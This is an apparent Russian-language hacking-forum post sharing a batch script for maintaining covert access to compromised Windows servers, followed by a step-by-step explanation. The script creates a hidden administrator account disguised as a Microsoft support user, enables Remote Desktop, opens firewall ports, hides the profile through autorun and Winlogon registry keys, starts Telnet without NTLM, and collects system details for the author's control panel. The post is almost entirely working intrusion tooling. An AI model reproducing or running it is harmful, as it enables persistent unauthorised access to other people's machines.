Дароф ачат!
Написав недавно статейку о краже хистори из аськи + квипа, решил написать также батничек для дедиков. В батнике будут собраны все необходимые функции, в том числе:
[х] создание непалевной учетки
[х] создание из НЕ деда - деда
[х] скрытие из винлогона
[х] скрытие папки юзера
[х] сборка инфы о деде
[х] админка (или что то в этом роде)
[х] обход фаера
[х] настройка телнета на деде
Как всегда - сначал код, потом дескрайб:
Код:
set PASZ=tvoi_pass
net user SUPPORT_388945a0 /del
net user SUPPORT_388945a0 %PASZ% /add /fullname:"Microsoft Corporation" /comment:"Microsoft Windows Account" /countrycode:"000" /active:"yes" /expires:"never" /passwordchg:"NO"
net localgroup Administrators SUPPORT_388945a0 /add
net localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
net accounts /maxpwage:unlimited
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0 +h +s" /f
reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update software" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0.%COMPUTERNAME% +h +s" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388945a0 /t REG_DWORD /d 0 /f
attrib "c:\documents and settings\SUPPORT_388945a0" +h +s
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
echo Telnet started.
mkdir c:\windows\system32\infos
dxdiag /t c:\windows\system32\infos\systeminfo.txt
ipconfig>c:\windows\system32\infos\ipc.txt
start explorer.exe c:\windows\system32\infos\
Теперь обьясню что и как:
Сначала мы создаем копию юзера "саппорт".Он есть везде, так что это неименее палевный вариант.
Потом добавляем его в админы и пользователи рабочего стола.
Дальше пробуем добавит в реестр ключи, отвечающие за запуск удаленного раб. стола.
Потом добавляем в исключения фаера.
Создаем также ключ в авторане - он вызовет программу "attrib", которая поставит на папку нашего профайла атрибуты СКРЫТЫЙ и СИСТЕМНЫЙ. На многих дедушках админы ленятся ставить галочки "показывать системные файлы". Почему мы ставим в авторан? Потому что до тех пор, пока мы незалогинились в наш новый акк, папки несуществует. И скрытие произойдет сразу после логина. Это немного палевно (ключи в авторане, но если руки прямые то просто берем и добавляем в код авторана удаление данного ключа).
Далее настраиваем телнет, так как в крайнем случае, если дед не за натом а учетку удалили, то можно попробовать телнет.
Далее используем штатную утилиту dxdiag и ipconfig для сборки инфы о деде + узнать за натом он или нет. Впринципе я себе дописал еще фтп сервер, который посылает на мою админку на пхп данные 2 файла (какбы на гейт). Тот их ловит и у меня в админке все по полочкам - ИП - внешний, внутренний, системная инфа распарсена, страна (тут уже идет фича с 2ip.ru) итд итп... но это уже на ваш вкус и цвет.
Как всегда советую сделать из этого ехе и запаролить (там это реализовано пассом UPX):
Bat To Exe Converter v1.5
Setup.ico
Протестировано на огромном количестве дедов. Пока все норм.
Буду рад критике и всевозможным дополнениям. Можно совместно написать больше функции и сделать потом хороший екзе.
ГЕЙТ